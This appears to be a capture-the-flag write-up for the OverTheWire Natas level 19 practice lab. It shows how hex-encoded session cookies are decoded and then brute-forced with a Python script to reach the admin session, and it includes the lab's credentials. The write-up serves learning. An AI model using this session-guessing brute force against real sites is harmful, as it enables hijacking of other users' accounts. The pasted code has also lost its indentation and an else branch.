After logging in we are greeted with the following message: This page uses mostly the same code as the previous level, but session IDs are no longer sequential…
So lets check what the PHPSESSID value is now. This can be done by going to your cookies in your browser, Press F12 and go to the tab storage. After logging in the value of PHPSESSID is 3235302d61. If we change this value and refresh the page the same value returns.
Lets try some other things. Lets login multiple times with nothing:
1st attempt 3431322d
2st attempt 3234352d
3rd attempt 3138322d
4rd attempt 3237302d
The value always end with 2d. Lets try filling in something else, for example A.
1st attempt 3239312d41
2st attempt 38322d41
3rd attempt 3330372d41
4rd attempt 3430362d41
Again, always the same ending value after what you enter. After researching this looks like a hexidecimal number. The value output always is xxx-A. Where xx is a number from 1 tot 3 numbers and an -A.
3239312d41 = 291-A
38322d41 = 82-A
3330372d41 = 307-A
3430362d41 = 406-A
Would the number still go from 1 to 640? Lets try if we can change our code to generate all hex codes for 1-640 and then -admin in hex behind it. After some searching, trying and retrying I wrote a loop where it would print the string and the hex value of the string. I came up with the following loop:
for i in range(1,641): print (str(i)+'-admin') hexencode = (str(i)+'-admin').encode("utf-8").hex() print (hexencode)
I have to write and google these parts of the code since I’m not to familiar with Python and still learning. A nice challenge if you ask me. Now we got a way to make the strings we want and convert them to hex we can edit our old code so we can bruteforce the PHPSESSID cookies. The code is:
url = "http://natas19.natas.labs.overthewire.org/"
auth_username = "natas19"
auth_password = "4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs"
user_str = "You are logged in as a regular user."
for i in range(1,641):
cookies = dict(PHPSESSID=(str(i)+'-admin').encode("utf-8").hex())
r = requests.get(url, auth=(auth_username, auth_password), cookies=cookies)
if user_str in r.text:
print ("Attempt ", i, " is not admin!")
print ("Attempt ", i, " IS ADMIN!")
After running is for a minute we got it. Attempt 281 is ADMIN! I didn’t print the cookie but it outputs the contents of the webpage so we can see the password. If you would like to see the hex value of the cookie you could let it print the value of cookie in the else statement. The password is: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF.